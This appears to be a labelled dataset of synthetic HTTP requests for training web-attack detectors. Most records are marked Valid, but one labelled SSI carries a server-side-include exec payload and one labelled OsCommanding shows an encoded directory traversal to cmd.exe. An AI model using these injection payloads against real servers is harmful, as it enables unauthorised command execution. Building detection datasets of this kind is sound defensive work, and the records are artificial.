X-Forwarded-For: 253.252.174.31
X-Serial-Number: 92954758156
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8994
Start - Id: 19937
class: Valid
GET /dtr9AvsOADO2nQ/ywzmH/nt/s25Ye7Ng8mTg3TOv1Bgn/c_LsfPkb/etjIGZ9h/rnsGistwItr/gstai3ly7Es/mperriO2ecYisn/nN_h/aG.swf?7j0boot.initNneWH=hoaokalIltshqoShk&99twc21oDnja=i_Ox&4YCD0dstyleAo=734447&od26ddtsftshe=7183915 HTTP/1.1
Host: www.ek4eo7e.be
Connection: keep-alive
Accept: video/*;q=0.3, video/*, text/*;q=0.2
Accept-Charset: iso-8859-8-i, us-ascii;q=0.7, euc-tw;q=0.3
Accept-Encoding: identity, gzip;q=0.8, deflate;q=0.2, gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 19.249.226.166
Cookie: aNe5dozh=nenhjdfrsosnr;mahh1iwtTel=ni;O7turDe=op
Cookie2: $Version="64"
Date: Sun, 30 Jul 06 10:05:08 GMT
ETag: W/"iA8bteKBoaupIAYOR.9F"
Expect: 100-continue
From: eeruearo@0jdeseld5.de
If-Modified-Since: Wed, 25 Aug 04 20:45:17 GMT
If-Unmodified-Since: Fri, 01 Dec 06 19:10:38 CET
If-Match: "3Q4EA45xJaK8_l-"
If-None-Match: *
If-Range: Sat, 10 Nov 07 08:34:16 CET
Max-Forwards: 6
MIME-Version: 1.1
Pragma: uhu=tsuns
Proxy-Authorization: Basic dWhyZXJwcmM6NHNubm00ZQ==
Authorization: Basic dGFvYzppbGd0
Range: -938127,36370-,-5
Referer: http://www.ysms6o.be/isod/ioPPge.exe
TE: trailers,deflate;q=0.5
Trailer: Upgrade
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 6.6; l3-em; rv:8.5.3) Gecko/59928338
UA-CPU: PowerPC
UA-Disp: 611,1277,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 756x2638
Via: 5.6 133.170.200.230
Transfer-Encoding: gzip
Upgrade: edt/2.6, Oofaeg/8.4, xttqn/2.8, loa/0.5
Warning: 450 48.243.254.125 "en3iG7pyth5l" 
X-Forwarded-For: 163.246.110.241
X-Serial-Number: 52555
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19937
Start - Id: 6145
class: Valid
POST /ahusdEUe.jpg? HTTP/1.0
Content-Length: 90
Content-Language: tmh0d,lnnes
Content-Encoding: identity
Content-Location: /fnV1ee/ni0ity2.cgi
Content-MD5: ZWFmc3RtdWE5bHJub1RvZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Sep 07 02:46:01 GMT
Last-Modified: Wed, 06 Jul 05 14:30:36 UTC
Host: 223.159.4.248
Connection: close
Accept: audio/*, image/png;q=0.1
Accept-Charset: iso-2022-jp, ks_c_5601-1987, us-ascii;q=0.2, utf-8;q=0.1
Accept-Encoding: 
Accept-Language: vhRsfe-ntmn;q=0.2, arcde-4ar23, hl6ei-ido;q=0.4
Cache-Control: min-fresh=72
Client-ip: 213.36.197.19
Cookie: ia2nr32tdssmy=3;tsensarajoos=wwrr?;toyus5O0huog=5133441;rls1Lrstrh=24819546;zreanN6hgyni=pokurWfokcna80Euf;Zet36=yteialotAvn
Cookie2: $Version="52"
Date: Thu, 17 Aug 06 22:38:37 CET
ETag: "-1JU0w8x7nVeD3F"
Expect: gbEoaHe=mbo4l
From: arnac8@nERnnE.be
If-Modified-Since: Mon, 26 Apr 10 01:14:28 CET
If-Unmodified-Since: Sun, 16 Sep 07 21:09:57 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 11 May 09 12:07:09 GMT
Max-Forwards: 4264
MIME-Version: 0.1
Pragma: hfPpl='a7ah'
Proxy-Authorization: Digest opaque="atR3"
Authorization: eenl OwriN=ekhy
Range: 611533-,1458-075
Referer: http://InrtvS.cz/rmhlRRll/kot0in/k1rryi/Meito.php4
TE: trailers
Trailer: Upgrade
User-Agent: 9esqEpkdw/6.9.0.3
UA-CPU: PowerPC
UA-Disp: 8680,157,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 853x3655
Via: HTTP/8.5 177.106.151.10
Transfer-Encoding: identity
Upgrade: pnds/8.6
Warning: 194 www.xmkm27h.jpg "hyeTpth" 
X-Forwarded-For: 175.130.165.6
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

fessefn=lup9saos&mn=5eee29mhuMC&wohasti9f7dr4i=drhm62&Dtmpsbgsound9@E7JXnc=52&ao=mUfuti8dt

End - Id: 6145
Start - Id: 22736
class: Valid
GET /qPIYn7nlHRu/tfEorafteny/JgxmlScnBO50z/unemcete59dt4u.png?ogelr5y0o2S=128&corz0q=9asca&uzkor2G=tS1&di3tarcutrSoa5=itdt&Xi=4&Mq=lrRS6nctago8dcoean&abD=cfR8 HTTP/1.1
Host: 98.196.238.232
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-korean;q=0.3, x-mac-greek;q=0.8, euc-cn;q=0.3, x-mac-arabic;q=0.6
Accept-Encoding: 
Accept-Language: anhayt-nyskni
Cache-Control: max-age=01399
Client-ip: 39.67.118.115
Cookie: MdeletenPV1IV=nslnQs;5gs3r=nGdlhdua0ima;K9Q1etc292AM=ynAJOWG9QOG;if2timeEapt=~nrwp-s
Cookie2: $Version="62"
Date: Wed, 27 Dec 06 12:33:30 UTC
ETag: W/"Hw.-vMq@PRe4kqvba1"
Expect: loaig=e0ueme
From: labOkeyp@Tmrr6ene.de
If-Modified-Since: Thu, 29 Dec 05 15:15:07 UTC
If-Unmodified-Since: Wed, 03 Sep 08 04:26:48 CET
If-Match: "MdNqJK4cAlXxcSc4.ci"
If-None-Match: *
If-Range: "NiCAAkqLwjFJ4qKhlk"
Max-Forwards: 1880
MIME-Version: 2.1
Pragma: no-cache
Proxy-Authorization: Digest qop=ldtEtf6e
Authorization: Digest uri=/hoiTptrr/lKaatsus/knaA.php4
Range: -59538
Referer: http://www.5rieLo68.it/d5a7i.rar
TE: trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/2.9 (Machintosh; U; Mac OS X 0.0; ah-ma; rv:4.2.1) Gecko/25652410
UA-CPU: MIPS
UA-Disp: 482,155,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0084x738
Via: HTTP/0.8 www.s8me2psw.html:62555, FTP/1.0 www.eOmenis.jpeg:1219, HTTP/8.3 www.3itew.shtml
Transfer-Encoding: gzip
Upgrade: nt4mte/1.5, e7ttw/7.8, rqstaj/5.3, 2fytn/3.2, adu/2.2
Warning: 950 135.96.59.66 "get026dNoiraiwlk" 
X-Forwarded-For: 57.171.74.241
X-Serial-Number: 46126280
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 22736
Start - Id: 29390
class: Valid
GET /tnlunle.htm? HTTP/1.0
Host: www.eruh.com
Connection: close
Accept: application/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: srEfehe=lhTrrn
Client-ip: 117.25.130.47
Cookie: ituieEreire=65260558;me=813654
Cookie2: $Version="476"
Date: Thu, 14 Dec 06 10:07:25 CET
ETag: "bON14samIGhEaxw"
Expect: eascesxn=TdAslls
From: osNmtbzi@essattenoe.ch
If-Modified-Since: Sun, 08 Feb 09 08:16:52 UTC
If-Unmodified-Since: Thu, 23 Oct 08 22:06:21 UTC
If-Match: "vm8S4fyokABGjVA"
If-None-Match: *
If-Range: Mon, 29 Mar 04 19:41:17 GMT
Max-Forwards: 1
MIME-Version: 0.8
Pragma: obss=d
Proxy-Authorization: Digest nonce
Authorization: Digest nc=25Cd9E7b
Range: 60-931,-49,8-736
Referer: /ihttP/ehttnus/todao.zip
TE: deflate
Trailer: Range
User-Agent: Mozilla/7.6 (Machintosh; U; Mac OS X 9.7; er-fA; rv:0.4.7) Gecko/51793360
UA-CPU: MIPS
UA-Disp: 468,4853,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 1934x9864
Via: 7.3 www.tw6eqti.shtml, 1.8 38.187.82.53, uah1ns/8.9 www.tsg1.tiff
Transfer-Encoding: identity
Upgrade: uraz/3.8
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 2.168.186.132
X-Serial-Number: 50755741783
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29390
Start - Id: 10263
class: Valid
GET /iB_vlk/lyvqLrd/dKpsArd6qoPNRgaj/xuo/c3_GTH/lamK7w/phpCtCWeLYEia_HP.jpg?1soipo6daaisp=s%5Coaeoformihs&9ecraB=location%3Ao&sdhrreozdNif=orfdo&tnaeH=oaotSinsacE9&MMYkyIO5tQadmin=%3B5&H5q7=4&ZZe-xtermA2=tz&V-sHB7I=4TIJy3&aarmcaioil1oaco=rnodedd%25rstyle++ HTTP/1.1
Host: www.uney.st
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874, cp-932
Accept-Encoding: 
Accept-Language: *
Cache-Control: ugibeoix=eaurpt1
Client-ip: 205.176.72.60
Cookie: soshEslrt6s47i5=675661;8y=0winnts1u&/8winntrpSylnhsh);adnllEshbsti=522075890;WWiy5oE0Y=eaerroplh2at4em
Cookie2: $Version="816"
Date: Thu, 05 Aug 04 20:40:53 UTC
ETag: "BfreOJ3WE66pfgqBB"
Expect: 100-continue
From: re5on@alasreme.gov
If-Modified-Since: Tue, 21 Aug 07 08:18:12 GMT
If-Unmodified-Since: Sat, 30 Jan 10 18:48:04 UTC
If-Match: "OUdVkhYj4ZScNUmaKQW2"
If-None-Match: *
If-Range: Sun, 02 May 10 10:18:12 CET
Max-Forwards: 2
MIME-Version: 0.7
Pragma: ee4inht=lc
Proxy-Authorization: aa0et EnnLMv=fsay
Authorization: Basic SWM5ZWVhckU6Nm5vWQ==
Range: 48806-,859-40,-983
Referer: http://www.i7i5.cz/reeia.exe
TE: deflate;q=0.6,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/2.7 (X11; U; Open BSD i386 6.1; rA-cu; rv:3.1.6) Gecko/55861338
UA-CPU: Sparc
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 0000x0475
Via: 0.9 www.bud8bshT.tiff
Transfer-Encoding: gzip
Upgrade: shoceh/2.3, belfot/0.4, n5AeS/6.7, pjnr/5.8, itP/7.3
Warning: 381 www.swT2Ci.png "AmssmipzjstT" 
X-Forwarded-For: 75.202.70.37
X-Serial-Number: 7837553364029
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10263
Start - Id: 7003
class: Valid
PUT /rsEeldl6xaekidet/u55gHKkKsVGMYK0/ouhdEensltkt/Euetorc5s/nniewcmenilteuhtu9i/uFY3-fi95W_8S/m1gdoXnItroayool/JBSfK7access_logermV4Y-xR/sfIrut1ennepe/oe.shtml? HTTP/1.0
Content-Length: 246
Content-Language: s74,tnh
Content-Encoding: deflate
Content-Location: http://www.ng1uT.fr/wTDe2e5l.jsp
Content-MD5: d2xybTVlcmFMb25oaG8yeQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Sep 08 18:53:54 GMT
Last-Modified: Sat, 23 May 09 20:51:38 GMT
Host: www.moubb.fr
Connection: eiSS
Accept: application/*, text/*, video/quicktime;q=0.1
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: e0hZ-7
Cache-Control: no-cache
Client-ip: 226.93.8.242
Cookie: NhuuhieokOIani=921011
Cookie2: $Version="107"
Date: Mon, 14 Aug 06 02:07:56 UTC
ETag: W/"w.PvYmAGNZz6lH6z"
Expect: eemEofag=eSxeemrI;nitcl92
From: wywe@Otr8e.st
If-Modified-Since: Tue, 24 Aug 04 21:31:37 UTC
If-Unmodified-Since: Thu, 21 Aug 08 07:30:02 GMT
If-Match: "DvSM62z-yMAHpo_QQ"
If-None-Match: "9W9UoS6M4aXIS_IK3"
If-Range: Sun, 28 Sep 08 03:02:51 GMT
Max-Forwards: 893
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: NTLM dWJubHNhV2V3dGluZWRyYmFYenFxZWdZZWNpZDMxYUZyb2Rqbg==
Authorization: t7j1 Zdjmr=eaufl
Range: 5-,-737
Referer: /8rEek.dll
TE: deflate;q=0.0
Trailer: From
User-Agent: aWkGSxo1d http://www.ebSot.cz
UA-CPU: 68000
UA-Disp: 065,120,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 584x6896
Via: aeEais/5.4 www.lgooa6.png, HTTP/6.4 252.134.168.236, 6.2 www.yttsihe7.jpeg
Transfer-Encoding: ioxgir
Upgrade: oenhl/2.3, epd/0.7
Warning: 506 www.isxea3en.htm "fCnsiousntr6A9nt" "Thu, 15 Mar 07 14:14:02 CET"
X-Forwarded-For: 67.65.254.52
X-Serial-Number: 95729667
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

te4iqtbsmyn=skupdate&RIOPMKncqzwr=fR&ui=t3siinagsz&5Lpf2=217811829&atego=adiN6sn&I@QgFNoX4httpinD=srhkl&m9tiaP1mhhna=s&node-j_Dcs3=6964365415&olyssUdeRT=ae06oNeiiaifecepe&na=9Dttosx&Asa2mui=k.V&nduRrtpseaTeo=2236&oEnh=formyTar<homescript0a[Ne

End - Id: 7003
Start - Id: 39934
class: SSI
POST /aTQ2-P9KJtLQcOwbG/Nei/sOVR_3r/BNDuunionH/o0WaZ39nXo_YeRupA/tZAGjra3MDYDWTOxB/npmidd/BJmjqm0gX.msf? HTTP/1.1
Content-Length: 101
Content-Language: I3diylu,3lt,4taa
Content-Encoding: gzip
Content-Location: /ileuhn/oseionmS/0Meas/eeczo/aii5.tar
Content-MD5: b29tZW5zbm9pZXNubWNlaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 28 Jan 06 08:44:43 UTC
Last-Modified: Fri, 30 Jun 06 07:25:29 CET
Host: 69.122.205.64
Connection: mesj
Accept: text/*, video/*;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: t-I8NofAyr, qs5t3W-h
Cache-Control: e=otnEm
Client-ip: 241.54.246.2
Cookie: yb8detinTt=u$dppainbbetweennm$awsw>l;trcm0na7=nqIatao;ss7peto=94775;.F2QGND@rechoC7=818907768;et4lbott5=eIwfImJAs8ed;ybawtObacqnoFu=aYSd7I3z2S
Cookie2: $Version="17"
Date: Mon, 29 Oct 07 01:25:21 GMT
ETag: "904lqZNeUrGwrPUmWLi1"
Expect: 100-continue
From: 2nbiytae@onefd75.cz
If-Modified-Since: Wed, 16 Jun 04 07:25:43 GMT
If-Unmodified-Since: Wed, 17 Dec 08 01:18:58 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 23 Apr 06 07:21:58 UTC
Max-Forwards: 733
MIME-Version: 6.0
Pragma: eyn2tl=de
Proxy-Authorization: 9eee n8oOu=o0srcbO3
Authorization: naadt uuhwd=aa77tee
Range: 065804-4,-22740,4181-
Referer: /NzaoOee.swf
TE: trailers,gzip,chunked
Trailer: User-Agent
User-Agent: ee65n/3.1.6.0.2
UA-CPU: Sparc
UA-Disp: 079,5438,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 625x1975
Via: iisi/1.9 45.161.44.95, 2.9 www.aaTfibac.gif, 6.5 227.213.13.202
Transfer-Encoding: gzip
Upgrade: awoh/8.2
Warning: 800 145.154.254.159 "waio" "Sat, 03 Feb 07 02:53:35 CET"
X-Forwarded-For: 54.46.237.13
X-Serial-Number: 10606493
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ejvt2tx12h=<!--#exec   cmd="/bin/ls   -l  /home/ulTisth/e9mt"     -->&rg1=084

End - Id: 39934
Start - Id: 5102
class: Valid
POST /i8NJoRgq0CLAmdHGUxBg/abx7@OG55cTTXm8x0f./ensRVxLuHoMQpAmPEW/iretkTigiIawNEedor/6v1011cL1Kmnl.O@-/we@/j7EZe8XfromNafO3/VTehomeKAjzDZq/wokc9XQeRaE/nyBI.asmx? HTTP/1.1
Content-Length: 185
Content-Language: j9t2yX
Content-Encoding: compress
Content-Location: http://www.djdnMtq.org/hotss.msf
Content-MD5: aWFEemRld3RjOHllZ3FzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 12 Feb 08 23:59:40 CET
Last-Modified: Fri, 15 Dec 06 21:09:38 UTC
Host: www.tmh1nsx.uk
Connection: ahwe
Accept: */*;q=0.1
Accept-Charset: euc-tw, cp-936;q=0.8, x-mac-roman;q=0.8, x-mac-roman
Accept-Encoding: 
Accept-Language: h-x
Cache-Control: only-if-cached
Client-ip: 214.176.234.46
Cookie: cu_xGbmvselectF5=Mrli;L1meS8sYEgWX=fhrsa;zdOoeanhfhMe=i7nfn7adnnahg;ttol=lzbicVdW8_;reao3twnmos=%uehW@/ms>%o
Cookie2: $Version="1"
Date: Thu, 18 Jan 07 04:10:14 CET
ETag: ".gbrYssKFPv@V7NeRZ02"
Expect: 100-continue
From: 0rOsmk4c@eredr.net
If-Modified-Since: Sun, 30 Oct 05 03:51:02 UTC
If-Unmodified-Since: Thu, 25 Dec 08 06:43:36 UTC
If-Match: "aZeHFdCDN4Vk6bACLVt"
If-None-Match: "XP@X_kjxP9aUI1m"
If-Range: "Z8V6IGl0bz6vQL@SF"
Max-Forwards: 9530
MIME-Version: 8.8
Pragma: d=tte
Proxy-Authorization: Basic MG5vdDpib29lcmhv
Authorization: Digest nc=a9eB4Dbd
Range: 492-
Referer: http://www.pzeepyem.fr/eeel.nsf
TE: trailers,trailers,deflate
Trailer: Host
User-Agent: ere5/3.4
UA-CPU: Sparc
UA-Disp: 648,7817,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 436x920
Via: crt/4.0 74.247.47.233, ePTty/1.9 92.187.144.46, FTP/7.3 82.147.220.145
Transfer-Encoding: deflate
Upgrade: er0ehc/2.7, phh/7.5, 1dao/0.3, easp/6.7, Gdae/4.3
Warning: 201 30.198.208.54 "slstaBaOnasolmatoin" "Thu, 04 Nov 04 06:08:49 GMT"
X-Forwarded-For: 248.188.122.40
X-Serial-Number: 5152392
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ymnSr2ru=jnfalli&uaIfltrd=tt &0sasu=ieechoRe5ii&eaZ=gF&rrodh=0fbnohtacceswinntzoewe&uaiframe8RI=Thelka aF&b8wsdperl4=7990288609&Q_gb@Pn=vnghutgn&vURsQaDm=12&hlaamoio=oawK&1lruudnmw=3762

End - Id: 5102
Start - Id: 9639
class: Valid
GET /hinoonnP/aT_dFfTHAd6ppil/d3F11YF.cazsP/l1@6Z-I01J_l6pux/4mWTulaoeicfa/tnnoetseAag/pFmailSnyk1m/xosE9EsEnSnluhnewAd/dWZb0zs-@0/tT4.nsf?m5e=9341370 HTTP/1.1
Host: www.moik.com
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: big5;q=0.4
Accept-Encoding: 
Accept-Language: gH9-rlns
Cache-Control: no-cache
Client-ip: 104.66.35.71
Cookie: yfledOIarte4pr7=62507645;IWDDERPqUD-=aa09laemse<sdO;hOviiestblcoic=lteeehILa;vc0EeusnSiYrin=md;tNCaTlinkHG5=8
Cookie2: $Version="50"
Date: Sun, 25 Jan 04 05:09:31 GMT
ETag: "fcob2DCu-BmUC1SXj"
Expect: n66hah
From: yiJqeaa@9hauhsGph.fr
If-Modified-Since: Mon, 25 Jul 05 18:30:24 UTC
If-Unmodified-Since: Sun, 20 Nov 05 04:54:50 GMT
If-Match: "VcU2QbmCk_8BO.yPNm"
If-None-Match: *
If-Range: Mon, 02 Aug 04 22:17:18 CET
Max-Forwards: 1868
MIME-Version: 7.5
Pragma: lvurt71='n0ta'
Proxy-Authorization: jyhe b0tkvyos=lioe3l1
Authorization: o8eIe iEyn=ain7l
Range: 580-560
Referer: /lgnxUeOn/orEcNsk/sn7ofi7.php
TE: trailers,trailers,deflate;q=0.3
Trailer: Host
User-Agent: Mozilla/7.6 (compatible; eabqiual; Windows NT; 5tcnY2atd)
UA-CPU: PowerPC
UA-Disp: 0833,784,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 904x062
Via: FTP/9.3 www.yNsh0.js, 1.5 www.iroro6.html
Transfer-Encoding: identity
Upgrade: sNh/6.5, ssodh/7.1, jrin/2.9, wHoee/3.7, reoo9/6.9
Warning: 349 180.160.218.155 "yeinlhnok" "Wed, 31 Oct 07 04:57:31 CET"
X-Forwarded-For: 48.192.127.27
X-Serial-Number: 04486
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9639
Start - Id: 2800
class: Valid
GET /k_f0eHgbM/eYJ3Vt.Q4W2/o_v184RmQcWwQkgHM4/b6U-5jFRK8KM/etito/4econnectvsystem0ATnc5A0r-t/ottwwed4ssn/0beegrax2/eMymyiftjorttt2eyF/aoao/onvkgHidns7f4oekeot/hCaClTUy1.nsf?xidadrhhOwaez=465&Yr2ow=908&corkec2rc7xtd=90261607&seihnalr=tF&oalrdHeW5is1qlu=479590&iseduek0osni=sAvY3Ai&et9otyLmciene=netdzoyoaaltvp&toLwhgtfe4ccehs=wt1qaESeg&FrcpAvusr=esNi5ib0&eneeezeeo=6581213 HTTP/1.0
Host: 253.25.65.36
Connection: close
Accept: application/postscript;q=0.6, video/mpeg;q=0.2, application/*;q=0.5
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, gzip
Accept-Language: izv-gtf, ryIc-a
Cache-Control: no-transform
Client-ip: 196.47.7.205
Cookie: 2Iomod8sj=vedsuEiityvaeehiq;4mi0eeHoSgs=9387;nr=2r1h;4clrhFU@=25748142;hetnposron=9832591;hpare1ad57=008112
Cookie2: $Version="984"
Date: Thu, 11 Mar 10 21:27:45 UTC
ETag: W/"z_bdEXG3UdyUaL@"
Expect: ibdjrcP6=sioha
From: arssA4ca@gl7rLYaldc.uk
If-Modified-Since: Mon, 25 Aug 08 17:30:46 UTC
If-Unmodified-Since: Sat, 01 May 10 24:11:51 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 03 May 06 13:12:12 UTC
Max-Forwards: 825
MIME-Version: 5.1
Pragma: 6quvs='r'
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: uats ocna=resae
Range: 653260-,8-79,061108-10
Referer: /pTgggwO.cgi
TE: trailers,trailers
Trailer: Warning
User-Agent: Mozilla/1.5 (X11; U; Linux i386 8.0; ke-hd; rv:9.9.3) Gecko/74585703
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 620x373
Via: 5.3 www.mhocA.jpg, 4.1 www.ceaoi.js:6644, 6.0 www.iiosAnv.htm
Transfer-Encoding: identity
Upgrade: Sbhjos/1.1
Warning: 126 www.incHlted.shtml "Oeitaulhesy" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2800
Start - Id: 27915
class: Valid
GET /rereirjh5tahwr/nv1NSBwrKOSTd-/eemSars6/select@Uy.dUHM/l1i2CJI3gRMLbUOM.cgi?iewqa=ArbpeDerrts&iraEowltaad79=e%7Ctr&so=e4lrgstwechild%5C0yrformaeval-&NjkjSA=5954525&Dd@iL=lr+heLt6m&rbNeyihOtami=yncis%2Bsn5yaan&Iethrsav2=onVz%5Cm%3D%3D%7C7%2FSdn%3D&D-Hftp=198&cesmnjoce2amem=dRc&AF=aYjs&h1gwneeddyt=7&s9=+Ton++r%3Dprocessing-instructionexecpa&8onzdoeq=023427&sdD@home=UisgAmahEnbif&uhzsec=sae%28mh+%5DIaszdqlXs HTTP/1.1
Host: www.srpgMnoegd.de
Connection: keep-alive
Accept: audio/basic;q=0.5, application/*, video/*;q=0.3
Accept-Charset: x-mac-arabic;q=0.4, x-mac-korean;q=0.7, x-mac-turkish;q=0.2
Accept-Encoding: identity;q=0.6, compress
Accept-Language: iezSresU-snn1t, 6nst-AlzMck;q=0.3, oyroau-fk;q=0.1
Cache-Control: no-store
Client-ip: 205.67.74.252
Cookie: noeilwnelao= awwinu-aEtrepl3e;ytla=1986024148
Cookie2: $Version="01"
Date: Fri, 10 Mar 06 19:47:00 GMT
ETag: W/"kVnrqEXsEjFC4z8"
Expect: oklydA=umoimt
From: ethjhtno@OeeoEam.be
If-Modified-Since: Tue, 09 Sep 08 18:37:17 CET
If-Unmodified-Since: Sun, 18 Nov 07 10:55:21 UTC
If-Match: "8vCsfambM9cyuGHtq"
If-None-Match: "gYRDasOuf6xycwf@w"
If-Range: "samVI0vop-5@xAlvT"
Max-Forwards: 2
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: NTLM cnJiamxmNGlndGllenNlUm9lblNzMXJ3M2d3aWpvVHV1b2Fvbg==
Authorization: NTLM dGlzYmdndXJlc2F0ZW9saXJ3bnlpYnJkaXhVeGRidG9zczRxaGlzQTIxaHJhbw==
Range: -7,3520-,31-
Referer: /80monee/8rmege.shtml
TE: chunked;q=0.5,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.5 (Machintosh; U; PPC Mac OS X 4.9; en-un; rv:7.9.2) Gecko/86927927
UA-CPU: Sparc
UA-Disp: 3738,726,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 064x094
Via: 7.7 140.206.231.7:10893
Transfer-Encoding: deflate
Upgrade: 2rp/1.4, 9p3l/6.4, s2li/1.7
Warning: 133 www.lJae.css "ewiowestteogamnuhux" "Sat, 06 Oct 07 10:45:03 CET"
X-Forwarded-For: 141.34.54.32
X-Serial-Number: 149066712456
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27915
Start - Id: 12559
class: Valid
GET /t@T/A3YBN3Uolm/3s0sUR-nc.sh?0ee=s56W&dtreo4fho0=Unoder9onqkaftpka%40nd&ynHtrttessi=0090&all-ck8=lskjeeCpvpaspe HTTP/1.1
Host: 216.121.8.209:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: ncs1-adpec, to-MRl;q=0.1, sK4rm-Dt
Cache-Control: no-cache
Client-ip: 157.23.61.107
Cookie: tz=8.4a6rc-NQ;dlesjoavr=eqJf;epi0s=6;mX5c=i3cmdigritmrih
Cookie2: $Version="91"
Date: Tue, 05 Aug 08 03:11:24 CET
ETag: W/"H8QW.ECYlsVSh.Lsv"
Expect: t5msite
From: oaii@fHeu.uk
If-Modified-Since: Mon, 19 Mar 07 09:53:30 GMT
If-Unmodified-Since: Sat, 07 Nov 09 11:45:30 GMT
If-Match: "dikna27Rbzed.IO.PSao"
If-None-Match: "sPrXlGCc9kxOUdOTeeW"
If-Range: Fri, 03 Oct 08 11:05:13 UTC
Max-Forwards: 175
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: Digest cnonce="iCAy"
Authorization: Basic dHN5a21KOmVvaGFuNzlp
Range: 86503-,-067547,349937-
Referer: http://nemun.gov/lymeajg/o3hh/tunsaor/otalolss/cleniwt.pl
TE: trailers
Trailer: Via
User-Agent: dfrh5Ohcooovh
UA-CPU: 68000
UA-Disp: 3658,3398,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 366x415
Via: FTP/0.8 217.161.150.156, 9.4 241.228.140.23, FTP/7.4 www.oqchm.gif
Transfer-Encoding: gzip
Upgrade: AGSes/3.1
Warning: 997 www.ce9up3.htm "ertyen49aeinh" 
X-Forwarded-For: 134.103.218.48
X-Serial-Number: 3472507595174879
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12559
Start - Id: 43905
class: OsCommanding
GET ..%c1%8s...%c1%8s..%c1%8s..%c1%8s..%c1%8s../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 51.117.208.154
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: gzip, deflate;q=0.6, identity;q=0.1
Accept-Language: *
Cache-Control: max-stale
Client-ip: 196.15.105.143
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="45"
Date: Wed, 05 Jan 05 22:02:56 GMT
ETag: W/"0oIq-QwFP03wjkKWU"
Expect: aneerIi4
From: hcfetsen@Poenvmrtr.biz
If-Modified-Since: Tue, 14 Jun 05 24:13:49 CET
If-Unmodified-Since: Mon, 29 Nov 04 07:23:02 UTC
If-Match: "bg@kYjpoQExGydxa4FQ2"
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: Tue, 07 Apr 09 08:41:41 UTC
Max-Forwards: 031
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: I7d4 pxamohog=uiio
Authorization: jaier uicSij=Hxcaxs
Range: 6652-,-36477,66590-93
Referer: http://www.srchtk.gov/rysmi/tdaztts.exe
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/7.5 (Windows; U; WinNT 5.4; ht-eg; rv:6.9.7) Gecko/42973147
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 349x5070
Via: 0.3 www.yrsua.jpeg, 3.9 173.211.149.174:45562, 8.5 www.TEtoh.png
Transfer-Encoding: deflate
